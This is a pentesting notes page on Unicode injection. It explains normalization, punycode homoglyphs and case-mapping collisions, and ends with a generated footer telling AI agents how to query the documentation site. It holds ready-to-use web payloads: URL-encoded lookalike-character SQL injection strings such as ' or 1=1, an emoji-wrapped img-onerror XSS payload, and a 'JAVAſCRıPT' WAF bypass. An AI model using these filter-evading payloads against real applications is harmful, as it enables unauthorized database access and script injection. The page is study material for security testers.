# Unicode Injection & Weaponising:

{% hint style="info" %}
Unicode Weaponising: <https://medium.com/csg-govtech/weaponizing-unicode-for-fun-and-profit-e2ce24d594c6>

Unicode Injection:  <https://book.hacktricks.xyz/pentesting-web/unicode-injection>

Unicode normalization: <https://book.hacktricks.xyz/pentesting-web/unicode-injection/unicode-normalization>
{% endhint %}

## Use of Unicode:

1.Punycode attacks:  ("аpple.com” transform into “xn–pple-43d.com” as "а" and "e" unicode char.)

2\. Case Mapping Collisions:  (when length of upercase and lowercase character and not same length.)

3.XSS

4.bypass filter

## Unicode Normalization:

generally Unicode normalization occurs when **unicode characters are normalized to ascii characters**.

### Testing:

**KELVIN SIGN’ (U+0212A)** ( `%e2%84%aa`) which **normalises to "K"** .

`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` after **unicode** normalization  `Leonishan`.

### Some useful character:

```
o -- %e1%b4%bc

r -- %e1%b4%bf

1 -- %c2%b9

= -- %e2%81%bc

/ -- %ef%bc%8f

- -- %ef%b9%a3

#-- %ef%b9%9f

*-- %ef%b9%a1

' -- %ef%bc%87

" -- %ef%bc%82

| -- %ef%bd%9c

```

```
' or 1=1-- -
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

" or 1=1-- -
%ef%bc%82+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

' || 1==1//
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

" || 1==1//
%ef%bc%82+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
```

<figure><img src="/files/ZV7DCF6vTkHYiEAcSkLR" alt=""><figcaption><p>used for xss ,if application is vulnerable to unicode normalization.</p></figcaption></figure>

### `/u` to `%` :

If backend transforms Unicode prefix  from  **`\u` in `%` . then it may use for XSS.**

**for example,**&#x63;har `㱋 (\u3c4b )`. If a backend **transforms** the prefix **`\u` in `%`**, the resulting string will be `%3c4b`, which URL decoded is: **`<4b`**. And,  **`<` char is injected**.

## Emoji Injection:

{% hint style="info" %}
Emoji list:

<https://unicode.org/emoji/charts-14.0/full-emoji-list.html>

<https://github.com/iorch/jakaton_feminicidios/blob/master/data/emojis.csv>
{% endhint %}

### Payload:

```
💋img src=x onerror=alert(document.domain)//💛

```

Code:

```php
<?php

$str = isset($_GET["str"]) ? htmlspecialchars($_GET["str"]) : "";

$str = iconv("Windows-1252", "UTF-8", $str);
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);

echo "String: " . $str;
```

## Case Mapping Collisions:

It happens, when uppercase length of a character and lowercase are not some.

Example:

```javascript
//"ß" and  "SS"
"ß".toUpperCase() == "SS" //true
"ß".toUpperCase().length == 2 //true
```

```javascript
> 'İ'.repeat(32).length
32
> 'İ'.repeat(32).toLowerCase().length
64
//  url encoded  %C4%B0
```

**Tool for Case Mapping Collisions:**   <https://spaceraccoon.github.io/unicollider/>

## Example Attack:

1.Password reset flow:

```java
var resetUser = database.findUserWithEmail(attackerInput.lowercase())
if resetUser != null: sendResetEmail(resetUser.resetToken(), attackerInput)
```

2.XSS:

```javascript
document.location = getQueryParam('redirect').toUpperCase();    // JAVAſCRıPT 
```

If use of `javascript:alert()` blocked by WAF, then  `JAVAſCRıPT` maybe work


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/unicode-injection-and-weaponising.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.